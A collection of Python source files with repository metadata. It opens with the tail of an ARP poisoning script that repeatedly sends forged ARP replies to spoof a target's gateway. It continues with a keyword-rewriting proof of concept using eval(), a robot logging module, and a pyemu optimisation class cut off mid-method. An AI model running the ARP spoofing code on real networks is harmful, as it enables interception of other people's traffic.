    src_ip_addr = get_src_ip_addr()
    dst_ip_addr = create_dst_ip_addr()
    dst_mac_addr = "\x00\x00\x00\x00\x00\x00"
    # ARP header: hw type 0x0001, proto 0x0800, hlen 6, plen 4, opcode 2 (reply)
    payload = "\x00\x01\x08\x00\x06\x04\x00\x02"
    checksum = "\x00\x00\x00\x00"
    # EtherType 0x0806 = ARP
    ethertype = "\x08\x06"
    while(1):
        sleep(2)
        s.send(dst_addr + src_addr + ethertype + payload+src_addr + src_ip_addr
               + dst_mac_addr + dst_ip_addr + checksum)
        print "Sending forged packets to " + argv[2]
# Validate the command line before starting the (infinite) poisoning loop.
if (len(argv) != 4):
    print "Usage: python arpois.py interface target_ip spoofing_ip."
    print "Example: python arpois.py wlan0 192.168.1.42 192.168.1.1"
    exit()
create_pkt_arp_poison()
| {
"repo_name": "Erethon/ArPois.py",
"path": "arpois.py",
"copies": "1",
"size": "2239",
"license": "mit",
"hash": -2107293771276831000,
"line_mean": 29.6712328767,
"line_max": 79,
"alpha_frac": 0.6248325145,
"autogenerated": false,
"ratio": 2.859514687100894,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8981085622996849,
"avg_score": 0.0006523157208088715,
"num_lines": 73
} |
# A proof of concept to show how to replace a fictitious keyword "repeat"
def transform_source_code(text):
    '''Replaces instances of
        repeat n:
    where "n" is an integer, by
        for VAR_i in range(n):
    where VAR_i is a string that does not appear elsewhere
    in the code sample. This code is not robust and is more
    a proof of concept than anything else.
    '''
    loop_keyword = 'repeat'
    nb = text.count(loop_keyword)
    if nb == 0:
        return text
    var_names = get_unique_variable_names(text, nb)
    processed_lines = []
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.startswith(loop_keyword):
            # remove end of line comment if present
            stripped = stripped.split('#')[0]
            if ':' in stripped:
                stripped = stripped.replace(loop_keyword, '')
                stripped = stripped.replace(':', '')
                index = line.find(loop_keyword)
                try:
                    # instead of simply allowing an int like "3",
                    # let's be a bit more lenient an allow things like
                    # "(3)" or "2*4"
                    # SECURITY: eval() executes arbitrary code; acceptable
                    # only because this proof of concept runs on trusted
                    # input.
                    n = eval(stripped)
                    assert isinstance(n, int)
                    line = '{0}for {1} in range({2}):'.format(
                        ' '*index, var_names.pop(), n)
                except Exception:  # any error leaves line unchanged
                    # (narrowed from a bare except, which also swallowed
                    # KeyboardInterrupt/SystemExit)
                    pass
        processed_lines.append(line)
    result = '\n'.join(processed_lines)
    return result


def get_unique_variable_names(text, nb):
    '''returns a list of possible variables names that
    are not found in the original text'''
    base_name = 'VAR_'
    var_names = []
    i = 0
    j = 0
    # keep trying VAR_0, VAR_1, ... until nb unused names are collected
    while j < nb:
        tentative_name = base_name + str(i)
        if text.count(tentative_name) == 0:
            var_names.append(tentative_name)
            j += 1
        i += 1
    return var_names
if __name__ == '__main__':
    # Demo: the indentation inside these literals drives the transformation.
    sample = '''
repeat 3: # first loop
    print('VAR_1')
    repeat (2*2):
        pass
'''
    comparison = '''
for VAR_2 in range(3):
    print('VAR_1')
    for VAR_0 in range(4):
        pass
'''
    # NOTE(review): splitlines()/join() drops sample's trailing newline while
    # the comparison literal keeps its own, so this equality check can fail
    # even when every line matches - confirm.
    if comparison == transform_source_code(sample):
        print("Transformation done correctly")
    else:
        print("Transformation done incorrectly")
        print("Expected code:\n", comparison)
        print("\nResult:\n", transform_source_code(sample))
| {
"repo_name": "aroberge/python_experiments",
"path": "version1/repeat_keyword.py",
"copies": "3",
"size": "2597",
"license": "cc0-1.0",
"hash": -6889070124189562000,
"line_mean": 28.5113636364,
"line_max": 73,
"alpha_frac": 0.5271467077,
"autogenerated": false,
"ratio": 4.215909090909091,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0006102693602693602,
"num_lines": 88
} |
"""A proto buffer based logging system for minitaur experiments.
The logging system records the time since reset, base position, orientation,
angular velocity and motor information (joint angle, speed, and torque) into a
proto buffer. See minitaur_logging.proto for more details. The episode_proto is
updated per time step by the environment and saved onto disk for each episode.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os, inspect
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
parentdir = os.path.dirname(os.path.dirname(currentdir))
os.sys.path.insert(0, parentdir)
import datetime
import os
import time
import tensorflow as tf
from pybullet_envs.minitaur.envs import minitaur_logging_pb2
NUM_MOTORS = 8
def _update_base_state(base_state, values):
base_state.x = values[0]
base_state.y = values[1]
base_state.z = values[2]
def preallocate_episode_proto(episode_proto, max_num_steps):
  """Preallocate the memory for proto buffer.

  Dynamically allocating memory as the protobuf expands causes unexpected delay
  that is not tolerable with locomotion control.

  Args:
    episode_proto: The proto that holds the state/action data for the current
      episode.
    max_num_steps: The max number of steps that will be recorded in the proto.
      The state/data over max_num_steps will not be stored in the proto.
  """
  for _ in range(max_num_steps):
    # add() appends one StepLog message; fields are zeroed explicitly so the
    # whole episode is allocated up front.
    step_log = episode_proto.state_action.add()
    step_log.info_valid = False
    step_log.time.seconds = 0
    step_log.time.nanos = 0
    # one motor-state entry per motor; NUM_MOTORS is fixed at 8 in this module
    for _ in range(NUM_MOTORS):
      motor_state = step_log.motor_states.add()
      motor_state.angle = 0
      motor_state.velocity = 0
      motor_state.torque = 0
      motor_state.action = 0
    # zero the three 3-vector base states (position, orientation, angular vel)
    _update_base_state(step_log.base_position, [0, 0, 0])
    _update_base_state(step_log.base_orientation, [0, 0, 0])
    _update_base_state(step_log.base_angular_vel, [0, 0, 0])
def update_episode_proto(episode_proto, minitaur, action, step):
  """Update the episode proto by appending the states/action of the minitaur.

  Note that the state/data over max_num_steps preallocated
  (len(episode_proto.state_action)) will not be stored in the proto.

  Args:
    episode_proto: The proto that holds the state/action data for the current
      episode.
    minitaur: The minitaur instance. See envs.minitaur for details.
    action: The action applied at this time step. The action is an 8-element
      numpy floating-point array.
    step: The current step index.
  """
  max_num_steps = len(episode_proto.state_action)
  if step >= max_num_steps:
    # writing past the preallocated region is silently skipped (with a warning)
    tf.logging.warning("{}th step is not recorded in the logging since only {} steps were "
                       "pre-allocated.".format(step, max_num_steps))
    return
  step_log = episode_proto.state_action[step]
  step_log.info_valid = minitaur.IsObservationValid()
  # split wall time since reset into whole seconds + nanoseconds
  time_in_seconds = minitaur.GetTimeSinceReset()
  step_log.time.seconds = int(time_in_seconds)
  step_log.time.nanos = int((time_in_seconds - int(time_in_seconds)) * 1e9)
  motor_angles = minitaur.GetMotorAngles()
  motor_velocities = minitaur.GetMotorVelocities()
  motor_torques = minitaur.GetMotorTorques()
  for i in range(minitaur.num_motors):
    step_log.motor_states[i].angle = motor_angles[i]
    step_log.motor_states[i].velocity = motor_velocities[i]
    step_log.motor_states[i].torque = motor_torques[i]
    step_log.motor_states[i].action = action[i]
  # base pose/rates are stored as x/y/z triples via _update_base_state
  _update_base_state(step_log.base_position, minitaur.GetBasePosition())
  _update_base_state(step_log.base_orientation, minitaur.GetBaseRollPitchYaw())
  _update_base_state(step_log.base_angular_vel, minitaur.GetBaseRollPitchYawRate())
class MinitaurLogging(object):
  """A logging system that records the states/action of the minitaur."""

  def __init__(self, log_path=None):
    # Directory where episode logs are written.  If None, save_episode is a
    # no-op that simply returns None.
    self._log_path = log_path

  # TODO(jietan): Consider using recordio to write the logs.
  def save_episode(self, episode_proto):
    """Save episode_proto to self._log_path.

    self._log_path is the directory name. A time stamp is the file name of the
    log file. For example, when self._log_path is "/tmp/logs/", the actual
    log file would be "/tmp/logs/yyyy-mm-dd-hh:mm:ss".

    Args:
      episode_proto: The proto that holds the states/action for the current
        episode that needs to be save to disk.

    Returns:
      The full log path, including the directory name and the file name.
    """
    # nothing to do for an unset path or an empty episode
    if not self._log_path or not episode_proto.state_action:
      return self._log_path
    if not tf.gfile.Exists(self._log_path):
      tf.gfile.MakeDirs(self._log_path)
    ts = time.time()
    time_stamp = datetime.datetime.fromtimestamp(ts).strftime("%Y-%m-%d-%H%M%S")
    log_path = os.path.join(self._log_path, "minitaur_log_{}".format(time_stamp))
    # NOTE(review): serialized proto bytes are written through a text-mode
    # handle ("w"); presumably tf.gfile tolerates this -- confirm, or
    # consider "wb".
    with tf.gfile.Open(log_path, "w") as f:
      f.write(episode_proto.SerializeToString())
    return log_path

  def restore_episode(self, log_path):
    """Restore the episodic proto from the log path.

    Args:
      log_path: The full path of the log file.

    Returns:
      The minitaur episode proto.
    """
    with tf.gfile.Open(log_path, 'rb') as f:
      content = f.read()
      episode_proto = minitaur_logging_pb2.MinitaurEpisode()
      episode_proto.ParseFromString(content)
      return episode_proto
| {
"repo_name": "MTASZTAKI/ApertusVR",
"path": "plugins/physics/bulletPhysics/3rdParty/bullet3/examples/pybullet/gym/pybullet_envs/minitaur/envs/minitaur_logging.py",
"copies": "2",
"size": "5395",
"license": "mit",
"hash": 3146372956271149000,
"line_mean": 36.7272727273,
"line_max": 91,
"alpha_frac": 0.7069508804,
"autogenerated": false,
"ratio": 3.3488516449410306,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5055802525341031,
"avg_score": null,
"num_lines": null
} |
"""a prototype multiobjective opt under uncertainty algorithm
"""
import os
import numpy as np
import pandas as pd
import pyemu
from .ensemble_method import EnsembleMethod
class ParetoObjFunc(object):
    """multiobjective function calculator.

    Maps observation (and, eventually, prior-information) quantities in a
    pyemu Pst to maximize/minimize objectives and provides Pareto-dominance,
    feasibility, crowding-distance and risk-shifting utilities used by the
    evolutionary algorithms below.
    """

    def __init__(self, pst, obj_function_dict, logger):
        # pst: pyemu.Pst instance; obj_function_dict maps an observation or
        # prior-info name to a "max"/"min" direction string; logger is a
        # pyemu Logger whose lraise() logs and then raises.
        self.logger = logger
        self.pst = pst
        # sentinel added to the crowd distance of the extreme solutions so
        # they are always retained when trimming the population
        self.max_distance = 1.0e30
        obs = pst.observation_data
        pi = pst.prior_information
        self.obs_dict, self.pi_dict = {}, {}
        for name, direction in obj_function_dict.items():
            if name in obs.obsnme:
                if direction.lower().startswith("max"):
                    self.obs_dict[name] = "max"
                elif direction.lower().startswith("min"):
                    self.obs_dict[name] = "min"
                else:
                    self.logger.lraise(
                        "unrecognized direction for obs obj func {0}:'{1}'".format(
                            name, direction
                        )
                    )
            elif name in pi.pilbl:
                if direction.lower().startswith("max"):
                    self.pi_dict[name] = "max"
                elif direction.lower().startswith("min"):
                    self.pi_dict[name] = "min"
                else:
                    self.logger.lraise(
                        "unrecognized direction for pi obj func {0}:'{1}'".format(
                            name, direction
                        )
                    )
            else:
                self.logger.lraise("objective function not found:{0}".format(name))
        # prior-information objectives are registered but not yet usable
        if len(self.pi_dict) > 0:
            self.logger.lraise("pi obj function not yet supported")
        self.logger.statement(
            "{0} obs objective functions registered".format(len(self.obs_dict))
        )
        for name, direction in self.obs_dict.items():
            self.logger.statement(
                "obs obj function: {0}, direction: {1}".format(name, direction)
            )
        self.logger.statement(
            "{0} pi objective functions registered".format(len(self.pi_dict))
        )
        for name, direction in self.pi_dict.items():
            self.logger.statement(
                "pi obj function: {0}, direction: {1}".format(name, direction)
            )
        # default nondomination test used by callers via self.is_nondominated
        self.is_nondominated = self.is_nondominated_continuous
        self.obs_obj_names = list(self.obs_dict.keys())

    def is_feasible(self, obs_df, risk=0.5):
        """identify which candidate solutions in obs_df (rows)
        are feasible with respect obs constraints (obs_df)

        Parameters
        ----------
        obs_df : pandas.DataFrame
            a dataframe with columns of obs names and rows of realizations
        risk : float
            risk value. If != 0.5, then risk shifting is used.  Otherwise, the
            obsval in Pst is used.  Default is 0.5.

        Returns
        -------
        is_feasible : pandas.Series
            series with obs_df.index and bool values
        """
        # todo deal with pi eqs
        is_feasible = pd.Series(data=True, index=obs_df.index)
        for lt_obs in self.pst.less_than_obs_constraints:
            if risk != 0.5:
                # NOTE(review): obs_df.loc[lt_obs] selects a *row* by label;
                # a column of realizations (obs_df.loc[:, lt_obs]) looks like
                # what get_risk_shifted_value expects -- confirm before using
                # risk != 0.5 here.
                val = self.get_risk_shifted_value(risk, obs_df.loc[lt_obs])
            else:
                val = self.pst.observation_data.loc[lt_obs, "obsval"]
            is_feasible.loc[obs_df.loc[:, lt_obs] >= val] = False
        for gt_obs in self.pst.greater_than_obs_constraints:
            if risk != 0.5:
                # NOTE(review): same row-vs-column concern as above
                val = self.get_risk_shifted_value(risk, obs_df.loc[gt_obs])
            else:
                val = self.pst.observation_data.loc[gt_obs, "obsval"]
            is_feasible.loc[obs_df.loc[:, gt_obs] <= val] = False
        return is_feasible

    @property
    def obs_obj_signs(self):
        # +1.0 for "max" objectives, -1.0 for "min", aligned with
        # self.obs_obj_names so all comparisons can be treated as maximization
        signs = []
        for obj in self.obs_obj_names:
            if self.obs_dict[obj] == "max":
                signs.append(1.0)
            else:
                signs.append(-1.0)
        signs = np.array(signs)
        return signs

    def dominates(self, sol1, sol2):
        # sol1 dominates sol2 iff it is no worse in every objective and
        # strictly better in at least one (signs fold min/max into max)
        d = self.obs_obj_signs * (sol1 - sol2)
        if np.all(d >= 0.0) and np.any(d > 0.0):
            return True
        return False

    def is_nondominated_pathetic(self, obs_df):
        """identify which candidate solutions are pareto non-dominated -
        super patheically slow...

        Parameters
        ----------
        obs_df : pandas.DataFrame
            dataframe with columns of observation names and rows of realizations

        Returns
        -------
        is_dominated : pandas.Series
            series with index of obs_df and bool series
        """
        obj_df = obs_df.loc[:, self.obs_obj_names]
        is_nondom = []
        # brute force: O(n^2) pairwise dominance checks
        for i, iidx in enumerate(obj_df.index):
            ind = True
            for jidx in obj_df.index:
                if iidx == jidx:
                    continue
                # if dominates(jidx,iidx):
                #     ind = False
                #     break
                if self.dominates(obj_df.loc[jidx, :], obj_df.loc[iidx, :]):
                    ind = False
                    break
            is_nondom.append(ind)
        is_nondom = pd.Series(data=is_nondom, index=obs_df.index, dtype=bool)
        return is_nondom

    def is_nondominated_continuous(self, obs_df):
        """identify which candidate solutions are pareto non-dominated continuously updated,
        but still slow

        Parameters
        ----------
        obs_df : pandas.DataFrame
            dataframe with columns of observation names and rows of realizations

        Returns
        -------
        is_dominated : pandas.Series
            series with index of obs_df and bool series
        """
        obj_df = obs_df.loc[:, self.obs_obj_names]
        P = list(obj_df.index)
        # PP is the continuously-maintained nondominated set
        PP = set()
        PP.add(P[0])
        # iidx = 1
        # while iidx < len(P):
        for iidx in P:
            jidx = 0
            drop = []
            keep = True
            for jidx in PP:
                # if dominates(iidx,jidx):
                #     drop.append(jidx)
                # elif dominates(jidx,iidx):
                #     keep = False
                #     break
                if jidx == iidx:
                    continue
                if self.dominates(obj_df.loc[iidx, :], obj_df.loc[jidx, :]):
                    drop.append(jidx)
                elif self.dominates(obj_df.loc[jidx, :], obj_df.loc[iidx, :]):
                    keep = False
                    break
            # removals are deferred until after iterating PP
            for d in drop:
                PP.remove(d)
            if keep:
                PP.add(iidx)
            # iidx += 1
        is_nondom = pd.Series(data=False, index=obs_df.index, dtype=bool)
        is_nondom.loc[PP] = True
        return is_nondom

    def is_nondominated_kung(self, obs_df):
        """identify which candidate solutions are pareto non-dominated using Kungs algorithm

        Parameters
        ----------
        obs_df : pandas.DataFrame
            dataframe with columns of observation names and rows of realizations

        Returns
        -------
        is_dominated : pandas.Series
            series with index of obs_df and bool series
        """
        obj_df = obs_df.loc[:, self.obs_obj_names]
        obj_names = self.obs_obj_names
        # sort by the first objective so that earlier entries cannot be
        # dominated by later ones in that objective
        ascending = False
        if self.obs_dict[obj_names[0]] == "min":
            ascending = True
        obj_df.sort_values(by=obj_names[0], ascending=ascending, inplace=True)
        P = list(obj_df.index)

        def front(p):
            # recursive divide-and-conquer front extraction (Kung et al.)
            if len(p) == 1:
                return p
            p = list(
                obj_df.loc[p, :].sort_values(by=obj_names[0], ascending=ascending).index
            )
            half = int(len(p) / 2)
            T = front(p[:half])
            B = front(p[half:])
            # keep members of the bottom half not dominated by the top half
            M = []
            i = 0
            while i < len(B):
                j = 0
                while j < len(T):
                    # if dominates(T[j],B[i]):
                    if self.dominates(obj_df.loc[T[j], :], obj_df.loc[B[i], :]):
                        break
                    j += 1
                if j == len(T):
                    M.append(B[i])
                i += 1
            T.extend(M)
            return T

        PP = front(P)
        is_nondom = pd.Series(data=False, index=obs_df.index, dtype=bool)
        is_nondom.loc[PP] = True
        return is_nondom

    def crowd_distance(self, obs_df):
        """determine the crowding distance for each candidate solution

        Parameters
        ----------
        obs_df : pandas.DataFrame
            dataframe with columns of observation names and rows of realizations

        Returns
        -------
        crowd_distance : pandas.Series
            series with index of obs_df and values of crowd distance
        """
        # initialize the distance container
        crowd_distance = pd.Series(data=0.0, index=obs_df.index)
        for name, direction in self.obs_dict.items():
            # make a copy - wasteful, but easier
            obj_df = obs_df.loc[:, name].copy()
            # sort so that largest values are first
            obj_df.sort_values(ascending=False, inplace=True)
            # set the ends so they are always retained
            crowd_distance.loc[obj_df.index[0]] += self.max_distance
            crowd_distance.loc[obj_df.index[-1]] += self.max_distance
            # process the vector: each interior point accumulates the gap
            # between its two neighbors along this objective
            i = 1
            for idx in obj_df.index[1:-1]:
                crowd_distance.loc[idx] += obj_df.iloc[i - 1] - obj_df.iloc[i + 1]
                i += 1
        return crowd_distance

    def get_risk_shifted_value(self, risk, series):
        # series: pandas Series of stack realizations for one observation;
        # its .name identifies whether it is an objective or a constraint,
        # which in turn fixes the shift direction
        n = series.name
        if n in self.obs_dict.keys():
            d = self.obs_dict[n]
            t = "obj"
        elif n in self.pst.less_than_obs_constraints:
            d = "min"
            t = "lt_obs"
        elif n in self.pst.greater_than_obs_constraints:
            d = "max"
            t = "gt_obs"
        else:
            self.logger.lraise(
                "series is not an obs obj func or obs inequality contraint:{0}".format(
                    n
                )
            )
        ascending = False
        if d == "min":
            ascending = True
        # empirical quantile: pick the value at the risk-shifted rank of the
        # sorted realizations
        s = series.shape[0]
        shift = int(s * risk)
        if shift >= s:
            shift = s - 1
        # NOTE(review): Series.apply(np.cumsum) operates element-wise and so
        # is effectively a no-op on scalar entries -- confirm the intent
        # (plain sort_values followed by .iloc[shift] gives the same value).
        cdf = series.sort_values(ascending=ascending).apply(np.cumsum)
        val = float(cdf.iloc[shift])
        # print(cdf)
        # print(shift,cdf.iloc[shift])
        # self.logger.statement("risk-shift for {0}->type:{1}dir:{2},shift:{3},val:{4}".format(n,t,d,shift,val))
        return val

    def reduce_stack_with_risk_shift(self, oe, num_reals, risk):
        """collapse a stacked observation ensemble (num_reals consecutive rows
        per candidate solution) to one risk-shifted row per solution; columns
        that are neither objectives nor constraints are reduced by their mean"""
        stochastic_cols = list(self.obs_dict.keys())
        stochastic_cols.extend(self.pst.less_than_obs_constraints)
        stochastic_cols.extend(self.pst.greater_than_obs_constraints)
        stochastic_cols = set(stochastic_cols)
        vvals = []
        for i in range(0, oe.shape[0], num_reals):
            oes = oe.iloc[i : i + num_reals]
            vals = []
            for col in oes.columns:
                if col in stochastic_cols:
                    val = self.get_risk_shifted_value(risk=risk, series=oes.loc[:, col])
                # otherwise, just fill with the mean value
                else:
                    val = oes.loc[:, col].mean()
                vals.append(val)
            vvals.append(vals)
        df = pd.DataFrame(data=vvals, columns=oe.columns)
        return df
class EvolAlg(EnsembleMethod):
    """Base class for ensemble-based evolutionary multiobjective algorithms.

    Wires a ParetoObjFunc to an EnsembleMethod run manager; concrete
    algorithms implement update().
    """

    def __init__(
        self,
        pst,
        parcov=None,
        obscov=None,
        num_workers=0,
        use_approx_prior=True,
        submit_file=None,
        verbose=False,
        port=4004,
        worker_dir="template",
    ):
        # NOTE(review): use_approx_prior is accepted but never used here --
        # confirm whether it should be forwarded to the base class.
        super(EvolAlg, self).__init__(
            pst=pst,
            parcov=parcov,
            obscov=obscov,
            num_workers=num_workers,
            submit_file=submit_file,
            verbose=verbose,
            port=port,
            worker_dir=worker_dir,
        )

    def initialize(
        self,
        obj_func_dict,
        num_par_reals=100,
        num_dv_reals=100,
        dv_ensemble=None,
        par_ensemble=None,
        risk=0.5,
        dv_names=None,
        par_names=None,
    ):
        """Build the initial decision-variable (and, for risk!=0.5, parameter)
        ensembles, evaluate them, and keep the feasible members.

        The four branches below dispatch on which of dv_ensemble /
        par_ensemble were supplied; anything missing is drawn from the prior.
        """
        # todo : setup a run results store for all candidate solutions? or maybe
        # just nondom, feasible solutions?
        # todo : check that the dv ensemble index is not duplicated
        self.dv_ensemble_archive = None
        self.obs_ensemble_archive = None
        if risk != 0.5:
            if risk > 1.0 or risk < 0.0:
                self.logger.lraise("risk not in 0.0:1.0 range")
        self.risk = risk
        self.obj_func = ParetoObjFunc(self.pst, obj_func_dict, self.logger)
        self.par_ensemble = None
        # all adjustable pars are dec vars
        if dv_ensemble is None and par_ensemble is None:
            self.num_dv_reals = num_dv_reals
            if dv_names is not None:
                aset = set(self.pst.adj_par_names)
                dvset = set(dv_names)
                diff = dvset - aset
                if len(diff) > 0:
                    self.logger.lraise(
                        "the following dv_names were not "
                        + "found in the adjustable parameters: {0}".format(
                            ",".join(diff)
                        )
                    )
                how = {p: "uniform" for p in dv_names}
            else:
                if risk != 0.5:
                    self.logger.lraise(
                        "risk != 0.5 but all adjustable pars are dec vars"
                    )
                how = {p: "uniform" for p in self.pst.adj_par_names}
            self.dv_ensemble = pyemu.ParameterEnsemble.from_mixed_draws(
                self.pst, how_dict=how, num_reals=num_dv_reals, cov=self.parcov
            )
            if risk != 0.5:
                aset = set(self.pst.adj_par_names)
                dvset = set(self.dv_ensemble.columns)
                diff = aset - dvset
                # NOTE(review): the message says "all adjustable parameters
                # are dec vars" but the guard fires when diff is NON-empty --
                # the condition and message look inconsistent; confirm.
                if len(diff) > 0:
                    self.logger.lraise(
                        "risk!=0.5 but all adjustable parameters are dec vars"
                    )
                self.par_ensemble = pyemu.ParameterEnsemble.from_gaussian_draw(
                    self.pst, num_reals=num_par_reals, cov=self.parcov
                )
            else:
                self.par_ensemble = None

        # both par ensemble and dv ensemble were passed
        elif par_ensemble is not None and dv_ensemble is not None:
            self.num_dv_reals = dv_ensemble.shape[0]
            aset = set(self.pst.adj_par_names)
            ppset = set(self.pst.par_names)
            dvset = set(dv_ensemble.columns)
            pset = set(par_ensemble.columns)
            diff = ppset - aset
            if len(diff) > 0:
                self.logger.lraise(
                    "the following par_ensemble names were not "
                    + "found in the pst par names: {0}".format(",".join(diff))
                )
            # NOTE(review): this second check reuses the same ``diff`` as the
            # first one (never recomputed from dvset), so it can never fire
            # independently -- presumably ``diff = dvset - aset`` was
            # intended; confirm.
            if len(diff) > 0:
                self.logger.lraise(
                    "the following dv_ensemble names were not "
                    + "found in the adjustable parameters: {0}".format(",".join(diff))
                )
            self.par_ensemble = par_ensemble
            self.dv_ensemble = dv_ensemble

        # dv_ensemble supplied, but not pars, so check if any adjustable pars are not
        # in dv_ensemble, and if so, draw reals for them
        elif dv_ensemble is not None and par_ensemble is None:
            self.num_dv_reals = dv_ensemble.shape[0]
            aset = set(self.pst.adj_par_names)
            dvset = set(dv_ensemble.columns)
            diff = dvset - aset
            if len(diff) > 0:
                self.logger.lraise(
                    "the following dv_ensemble names were not "
                    + "found in the adjustable parameters: {0}".format(",".join(diff))
                )
            self.dv_ensemble = dv_ensemble
            if risk != 0.5:
                if par_names is not None:
                    pset = set(par_names)
                    diff = pset - aset
                    if len(diff) > 0:
                        self.logger.lraise(
                            "the following par_names were not "
                            + "found in the adjustable parameters: {0}".format(
                                ",".join(diff)
                            )
                        )
                    how = {p: "gaussian" for p in par_names}
                else:
                    adj_pars = aset - dvset
                    if len(adj_pars) == 0:
                        self.logger.lraise(
                            "risk!=0.5 but all adjustable pars are dec vars"
                        )
                    how = {p: "gaussian" for p in adj_pars}
                self.par_ensemble = pyemu.ParameterEnsemble.from_mixed_draws(
                    self.pst, how_dict=how, num_reals=num_par_reals, cov=self.parcov
                )
            else:
                diff = aset - dvset
                if len(diff) > 0:
                    self.logger.warn(
                        "adj pars {0} missing from dv_ensemble".format(",".join(diff))
                    )
                    # fall back to a single realization of the control-file
                    # values for the non-dec-var parameters
                    df = pd.DataFrame(self.pst.parameter_data.loc[:, "parval1"]).T
                    self.par_ensemble = pyemu.ParameterEnsemble.from_dataframe(
                        df=df, pst=self.pst
                    )
                    print(self.par_ensemble.shape)

        # par ensemble supplied but not dv_ensmeble, so check for any adjustable pars
        # that are not in par_ensemble and draw reals. Must be at least one...
        elif par_ensemble is not None and dv_ensemble is None:
            self.num_dv_reals = num_dv_reals
            aset = set(self.pst.par_names)
            pset = set(par_ensemble.columns)
            diff = aset - pset
            if len(diff) > 0:
                self.logger.lraise(
                    "the following par_ensemble names were not "
                    + "found in the pst par names: {0}".format(",".join(diff))
                )
            self.par_ensemble = par_ensemble
            if dv_names is None:
                self.logger.lraise(
                    "dv_names must be passed if dv_ensemble is None and par_ensmeble is not None"
                )
            dvset = set(dv_names)
            diff = dvset - aset
            if len(diff) > 0:
                self.logger.lraise(
                    "the following dv_names were not "
                    + "found in the adjustable parameters: {0}".format(",".join(diff))
                )
            how = {p: "uniform" for p in dv_names}
            self.dv_ensemble = pyemu.ParameterEnsemble.from_mixed_draws(
                self.pst,
                how_dict=how,
                num_reals=num_dv_reals,
                cov=self.parcov,
                partial=True,
            )

        self.last_stack = None
        self.logger.log(
            "evaluate initial dv ensemble of size {0}".format(self.dv_ensemble.shape[0])
        )
        self.obs_ensemble = self._calc_obs(self.dv_ensemble)
        self.logger.log(
            "evaluate initial dv ensemble of size {0}".format(self.dv_ensemble.shape[0])
        )
        isfeas = self.obj_func.is_feasible(self.obs_ensemble, risk=self.risk)
        isnondom = self.obj_func.is_nondominated(self.obs_ensemble)
        vc = isfeas.value_counts()
        if True not in vc:
            self.logger.lraise("no feasible solutions in initial population")
        self.logger.statement(
            "{0} feasible individuals in initial population".format(vc[True])
        )
        # keep only the feasible members
        self.dv_ensemble = self.dv_ensemble.loc[isfeas, :]
        self.obs_ensemble = self.obs_ensemble.loc[isfeas, :]
        vc = isnondom.value_counts()
        if True in vc:
            self.logger.statement(
                "{0} nondominated solutions in initial population".format(vc[True])
            )
        else:
            self.logger.statement("no nondominated solutions in initial population")
        self.dv_ensemble = self.dv_ensemble.loc[isfeas, :]
        self.obs_ensemble = self.obs_ensemble.loc[isfeas, :]
        self.pst.add_transform_columns()
        self._initialized = True

    @staticmethod
    def _drop_failed(failed_runs, dv_ensemble, obs_ensemble):
        # remove realizations that failed to run from both ensembles
        if failed_runs is None:
            return
        dv_ensemble.loc[failed_runs, :] = np.NaN
        # NOTE(review): axis=1 drops *columns*; after NaN-ing whole rows,
        # axis=0 looks intended.  Also dropna returns a new frame bound to the
        # local name only, so the caller's ensembles are not reduced -- confirm.
        dv_ensemble = dv_ensemble.dropna(axis=1)
        obs_ensemble.loc[failed_runs, :] = np.NaN
        obs_ensemble = obs_ensemble.dropna(axis=1)
        # NOTE(review): ``self`` is not defined inside a @staticmethod -- this
        # raises NameError whenever failed_runs is not None; confirm.
        self.logger.statement(
            "dropped {0} failed runs, {1} remaining".format(
                len(failed_runs), dv_ensemble.shape[0]
            )
        )

    def _archive(self, dv_ensemble, obs_ensemble):
        # append the (copied) ensembles, tagged with feasibility,
        # nondomination, iteration and crowd distance, to the archives
        self.logger.log("archiving {0} solutions".format(dv_ensemble.shape[0]))
        if dv_ensemble.shape[0] != obs_ensemble.shape[0]:
            self.logger.lraise(
                "EvolAlg._archive() error: shape mismatch: {0} : {1}".format(
                    dv_ensemble.shape[0], obs_ensemble.shape[0]
                )
            )
        obs_ensemble = obs_ensemble.copy()
        dv_ensemble = dv_ensemble.copy()
        isfeas = self.obj_func.is_feasible(obs_ensemble)
        isnondom = self.obj_func.is_nondominated(obs_ensemble)
        cd = self.obj_func.crowd_distance(obs_ensemble)
        obs_ensemble.loc[isfeas.index, "feasible"] = isfeas
        obs_ensemble.loc[isnondom.index, "nondominated"] = isnondom
        dv_ensemble.loc[isfeas.index, "feasible"] = isfeas
        dv_ensemble.loc[isnondom.index, "nondominated"] = isnondom
        obs_ensemble.loc[:, "iteration"] = self.iter_num
        dv_ensemble.loc[:, "iteration"] = self.iter_num
        obs_ensemble.loc[cd.index, "crowd_distance"] = cd
        dv_ensemble.loc[cd.index, "crowd_distance"] = cd
        if self.obs_ensemble_archive is None:
            self.obs_ensemble_archive = obs_ensemble._df.loc[:, :]
            self.dv_ensemble_archive = dv_ensemble._df.loc[:, :]
        else:
            self.obs_ensemble_archive = self.obs_ensemble_archive.append(
                obs_ensemble._df.loc[:, :]
            )
            self.dv_ensemble_archive = self.dv_ensemble_archive.append(
                dv_ensemble.loc[:, :]
            )

    def _calc_obs(self, dv_ensemble):
        # evaluate the candidate solutions; when a parameter (uncertainty)
        # ensemble is present, each solution is run against the whole stack
        # and the stack is reduced to one risk-shifted row per solution
        if self.par_ensemble is None:
            failed_runs, oe = super(EvolAlg, self)._calc_obs(dv_ensemble)
        else:
            # make a copy of the org par ensemble but as a df instance
            df_base = self.par_ensemble._df.loc[:, :]
            # stack up the par ensembles for each solution
            dfs = []
            for i in range(dv_ensemble.shape[0]):
                solution = dv_ensemble.iloc[i, :]
                df = df_base.copy()
                df.loc[:, solution.index] = solution.values
                dfs.append(df)
            df = pd.concat(dfs)
            # reset with a range index
            org_index = df.index.copy()
            df.index = np.arange(df.shape[0])
            failed_runs, oe = super(EvolAlg, self)._calc_obs(df)
            if oe.shape[0] != dv_ensemble.shape[0] * self.par_ensemble.shape[0]:
                self.logger.lraise("wrong number of runs back from stack eval")
            EvolAlg._drop_failed(failed_runs, dv_ensemble, oe)
            self.last_stack = oe.copy()
            self.logger.log("reducing initial stack evaluation")
            df = self.obj_func.reduce_stack_with_risk_shift(
                oe, self.par_ensemble.shape[0], self.risk
            )
            self.logger.log("reducing initial stack evaluation")
